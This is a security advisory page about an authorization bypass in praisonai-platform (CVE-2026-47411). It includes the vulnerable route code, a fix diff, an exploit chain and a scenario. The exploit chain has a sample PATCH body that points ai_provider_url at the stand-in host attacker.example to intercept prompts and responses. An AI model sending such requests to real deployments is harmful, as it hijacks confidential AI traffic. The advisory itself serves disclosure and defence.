AI Threat Alert

CVE-2026-47411: PraisonAI: auth bypass allows workspace settings injection

GHSA-rcmc-q9rj-4wmq MEDIUM
Published June 1, 2026
CISO Take

Any authenticated workspace member in PraisonAI platform can overwrite the workspace name, description, and free-form settings JSON blob with a single PATCH request — no owner privileges required, just a valid member JWT. The real concern is not metadata defacement: the settings blob drives downstream platform behavior including LLM provider endpoints, webhook routing, and feature flags. A malicious insider or compromised member account can silently redirect all AI inference traffic in the workspace to an attacker-controlled proxy, intercepting every prompt and response without any indication to workspace owners. Exploitation requires no technical sophistication beyond a standard HTTP client. Organizations running praisonai-platform should upgrade to 0.1.4 immediately and audit current workspace settings for anomalous provider URLs or webhook endpoints.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

Medium by CVSS but with outsized potential impact in multi-tenant AI agent deployments. Exploitation is trivial — a single authenticated PATCH from the lowest privilege tier. The free-form settings blob is the real risk amplifier: whatever the platform reads from that field becomes attacker-controllable, including LLM provider endpoints that govern where all AI inference traffic flows. The package has 65 other CVEs on record, indicating a systemic pattern of security debt in PraisonAI. While not in CISA KEV and EPSS data is unavailable, triviality of exploitation combined with potential for confidential AI conversation interception elevates practical risk well beyond the raw 6.5 CVSS score in any deployment handling sensitive AI workloads.

Attack Kill Chain

Initial Access
Attacker obtains a valid workspace member JWT through legitimate onboarding, credential theft, or insider access — no elevated privileges required.
AML.T0012
Authorization Bypass
Attacker sends PATCH /workspaces/{id}; the require_workspace_member check passes for any member role, skipping the owner-only gate that should protect this endpoint.
AML.T0049
Configuration Injection
Attacker writes arbitrary values into the workspace settings JSON blob — redirecting ai_provider_url to attacker infrastructure and toggling feature flags such as public invite.
AML.T0081
AI Traffic Interception
All subsequent LLM inference calls from agents in the compromised workspace route through the attacker's proxy, enabling silent capture of all prompts and responses.
AML.T0025

What systems are affected?

Package Ecosystem Vulnerable Range Patched
praisonai-platform pip < 0.1.4 0.1.4
1 dependents 86% patched ~0d to patch Full package profile →

Do you use praisonai-platform? You're affected.

Severity & Risk

CVSS 3.1
6.5 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C None
I High
A None

What should I do?

5 steps

  1. Patch immediately: upgrade to praisonai-platform 0.1.4 which corrects the authorization check on PATCH /workspaces/{id} to require owner role.

  2. Until patched: treat workspace membership as equivalent to admin access and restrict it to fully trusted personnel only.

  3. Detection: monitor HTTP logs for PATCH requests to /workspaces/ paths, especially from member-role accounts; alert on any changes to workspace name or settings fields.

  4. Remediation: audit all current workspace settings JSON blobs for anomalous values — specifically any provider_url, ai_provider_url, webhook_url, or similar endpoint fields pointing to unexpected external domains.

  5. Defense-in-depth post-patch: validate settings keys against an allowlist in WorkspaceService.update() so the field cannot become an arbitrary config-injection primitive even for owners, as advised in the upstream fix.

Classification

Auth Bypass Data Extraction Agent API AML.T0012 AML.T0025 AML.T0049 AML.T0081

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
ISO 42001
6.1.2 - AI risk assessment
NIST AI RMF
MANAGE 2.2 - Mechanisms to neutralize identified AI risks
OWASP LLM Top 10
LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2026-47411?

Any authenticated workspace member in PraisonAI platform can overwrite the workspace name, description, and free-form settings JSON blob with a single PATCH request — no owner privileges required, just a valid member JWT. The real concern is not metadata defacement: the settings blob drives downstream platform behavior including LLM provider endpoints, webhook routing, and feature flags. A malicious insider or compromised member account can silently redirect all AI inference traffic in the workspace to an attacker-controlled proxy, intercepting every prompt and response without any indication to workspace owners. Exploitation requires no technical sophistication beyond a standard HTTP client. Organizations running praisonai-platform should upgrade to 0.1.4 immediately and audit current workspace settings for anomalous provider URLs or webhook endpoints.

Is CVE-2026-47411 actively exploited?

No confirmed active exploitation of CVE-2026-47411 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-47411?

1. Patch immediately: upgrade to praisonai-platform 0.1.4 which corrects the authorization check on PATCH /workspaces/{id} to require owner role. 2. Until patched: treat workspace membership as equivalent to admin access and restrict it to fully trusted personnel only. 3. Detection: monitor HTTP logs for PATCH requests to /workspaces/ paths, especially from member-role accounts; alert on any changes to workspace name or settings fields. 4. Remediation: audit all current workspace settings JSON blobs for anomalous values — specifically any provider_url, ai_provider_url, webhook_url, or similar endpoint fields pointing to unexpected external domains. 5. Defense-in-depth post-patch: validate settings keys against an allowlist in WorkspaceService.update() so the field cannot become an arbitrary config-injection primitive even for owners, as advised in the upstream fix.

What systems are affected by CVE-2026-47411?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, multi-tenant AI platforms, LLM API proxy configurations.

What is the CVSS score for CVE-2026-47411?

CVE-2026-47411 has a CVSS v3.1 base score of 6.5 (MEDIUM).

AI Security Impact

Affected AI Architectures

agent frameworksmulti-tenant AI platformsLLM API proxy configurations

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: 6.1.2
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM07

Technical Details

Original Advisory

## Summary **Type:** Authorization bypass enabling workspace metadata + settings tampering. The `PATCH /workspaces/{workspace_id}` endpoint is gated only by `require_workspace_member(workspace_id)` (default `min_role="member"`). Any member can rewrite the workspace's `name`, `description`, and the `settings` JSON blob. The settings field is a free-form JSON object — depending on which downstream code reads it, this becomes a configuration-injection primitive for any setting the platform exposes there. **File:** `src/praisonai-platform/praisonai_platform/api/routes/workspaces.py`, lines 63-74; `services/workspace_service.py`'s `update()` method. **Root cause:** `Depends(require_workspace_member)` resolves to default `min_role="member"`. `WorkspaceService.update(workspace_id, name, description, settings)` writes the new fields to the workspace row without any caller-permission check. The role hierarchy (`MemberService.has_role`) is never consulted. ## Affected Code **File:** `src/praisonai-platform/praisonai_platform/api/routes/workspaces.py`, lines 63-74. ```python @router.patch("/{workspace_id}", response_model=WorkspaceResponse) async def update_workspace( workspace_id: str, body: WorkspaceUpdate, user: AuthIdentity = Depends(require_workspace_member), # <-- BUG: defaults to min_role="member" session: AsyncSession = Depends(get_db), ): ws_svc = WorkspaceService(session) ws = await ws_svc.update(workspace_id, body.name, body.description, body.settings) # <-- writes any value if ws is None: raise HTTPException(status_code=404, detail="Workspace not found") return WorkspaceResponse.model_validate(ws) ``` **Why it's wrong:** workspace name and settings are owner-tier fields. Renaming the workspace to a profanity is a low-impact griefing vector; rewriting the JSON `settings` blob is potentially a much higher-impact configuration injection (depending on what fields downstream code reads from `settings`, the attacker may flip feature flags, redirect webhook URLs, change LLM provider keys for shared configs, disable audit logging, etc.). The `require_workspace_member(min_role)` parameter is implemented and unused. This endpoint should require owner. ## Exploit Chain 1. Attacker is a member of workspace `W` with role "member". State: attacker holds JWT. 2. Attacker sends `PATCH /workspaces/W` with `Authorization: Bearer <attacker_jwt>` and body `{"name": "Compromised", "description": "Owned by attacker", "settings": {"allow_public_invite": true, "ai_provider_url": "https://attacker.example/v1"}}`. State: control flow enters `update_workspace`. 3. `require_workspace_member(W, attacker)` passes. `WorkspaceService.update(W, ...)` writes the three fields. State: workspace `W` now has attacker-chosen name, description, and settings. 4. The settings JSON is read by any downstream code that consults workspace settings (LLM proxying, invite flows, webhook routing). If the deployment uses settings-keyed configuration overrides, those overrides now point at attacker-controlled endpoints. 5. Final state: with one member-level token plus one PATCH, the attacker rewrites the workspace's metadata and settings, with effects ranging from cosmetic (rename) to substantive (settings-keyed config injection). ## Security Impact **Severity:** sec-moderate. CVSS 6.5: network attack, low complexity, low privileges, no user interaction, scope unchanged, no confidentiality directly (though settings rewrites may enable indirect data exfiltration via attacker-pointed integration URLs), high integrity, no availability claim. **Attacker capability:** rewrite any workspace's name, description, and settings JSON. The actual blast radius depends on what fields the deployment reads from `settings` — but that field is documented as a free-form JSON blob, so any future configuration the platform adds there becomes attacker-tunable. **Preconditions:** `praisonai-platform` is deployed multi-tenant; attacker has any membership token in the target workspace. **Differential:** source-inspection-verified. With the suggested fix below, member-tier tokens fail the gate and the metadata rewrite is rejected with 403. ## Suggested Fix ```diff --- a/src/praisonai-platform/praisonai_platform/api/routes/workspaces.py +++ b/src/praisonai-platform/praisonai_platform/api/routes/workspaces.py @@ -63,11 +63,11 @@ @router.patch("/{workspace_id}", response_model=WorkspaceResponse) async def update_workspace( workspace_id: str, body: WorkspaceUpdate, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(_require_workspace_owner), # see member-update-role advisory for helper session: AsyncSession = Depends(get_db), ): ws_svc = WorkspaceService(session) ws = await ws_svc.update(workspace_id, body.name, body.description, body.settings) if ws is None: raise HTTPException(status_code=404, detail="Workspace not found") return WorkspaceResponse.model_validate(ws) ``` Defence-in-depth: validate the keys allowed in `body.settings` against an allowlist so the field cannot become an arbitrary config-injection primitive even for owners. The four companion workspace-mutation endpoints (`add_member`, `update_member_role`, `remove_member`, `delete_workspace`) exhibit the same default-min-role gap and are filed as their own advisories.

Exploitation Scenario

A contractor with workspace member access at a firm running PraisonAI for internal AI workflows sends a single curl command: PATCH /workspaces/finance-ws-001 with body {"settings": {"ai_provider_url": "https://attacker.example/v1", "allow_public_invite": true}}. All subsequent LLM calls from agents in that workspace — including those processing confidential client data — route through the attacker's proxy, which logs every prompt and response while transparently forwarding to the real provider. The workspace owner sees no indication of the change without explicitly inspecting the settings object. The attacker simultaneously enables public invites, expanding their foothold. The entire attack completes in under 60 seconds and leaves no application-layer alert.

Weaknesses (CWE)

CWE-269 Improper Privilege Management Primary CWE-862 Missing Authorization Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

References

Timeline

Published
June 1, 2026
Last Modified
June 1, 2026
First Seen
June 1, 2026

Related Vulnerabilities

CRITICAL CVE-2026-47392 9.9

praisonaiagents: RCE via Python sandbox bypass

Same package: praisonai
CRITICAL GHSA-vc46-vw85-3wvm 9.8

PraisonAI: RCE via malicious workflow YAML execution

Same package: praisonai
CRITICAL CVE-2026-39890 9.8

PraisonAI: YAML deserialization enables unauthenticated RCE

Same package: praisonai
CRITICAL GHSA-9qhq-v63v-fv3j 9.8

PraisonAI: RCE via MCP command injection

Same package: praisonai
CRITICAL CVE-2026-47410 9.8

praisonai-platform: hardcoded JWT → full account takeover

Same package: praisonai
Back to Threat Feed